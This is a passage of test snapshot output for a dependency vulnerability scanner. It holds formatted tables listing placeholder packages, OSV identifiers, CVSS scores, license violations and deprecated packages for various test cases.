vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfi ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬───────────────┬─────────┬─────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼───────────────┼─────────┼─────────────────── ≈ │ MIT │ Packagist │ author1/mine1 │ 1.2.3 │ path/to/my/first/l ≈ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/ ≈ │ MIT │ Packagist │ author1/mine1 │ 1.2.3 │ path/to/my/third/l ≈ ╰───────────────────┴───────────┴───────────────┴─────────┴─────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfi ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT, Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ 7.8 │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfil ≈ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfil ≈ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfil ≈ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. ╭─────────────────────────────────────────────────────────╮ │ Deprecated packages │ ├───────────┬────────────────┬─────────┬──────────────────┤ │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────┼────────────────┼─────────┼──────────────────┤ │ npm │ deprecated-pkg │ 1.0.0 │ path/to/lockfile │ ╰───────────┴────────────────┴─────────┴──────────────────╯ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine2 │ 5.9.0 │ path/to/my/second/lockfi ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VER ≈ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-5 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 (dev) │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-3 │ │ npm │ mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ npm │ mine3 │ 0.4.1 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-5 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-3 │ │ npm │ mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ npm │ mine3 │ 0.4.1 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬───────────────┬─────────┬──────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED V ≈ ├───────────────────────┼──────┼───────────┼───────────────┼─────────┼──────── ≈ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-3 │ 4.3 │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- ≈ ╰───────────────────────┴──────┴───────────┴───────────────┴─────────┴──────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬───────────────┬─────────┬───── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXE ≈ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───── ≈ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-3 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- ≈ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───── ≈ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴───────────────┴─────────┴───── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬───────────────┬─────────┬──────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED V ≈ ├───────────────────────┼──────┼───────────┼───────────────┼─────────┼──────── ≈ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-3 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ │ -- ≈ ╰───────────────────────┴──────┴───────────┴───────────────┴─────────┴──────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/GHSA-123 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ 9 │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ 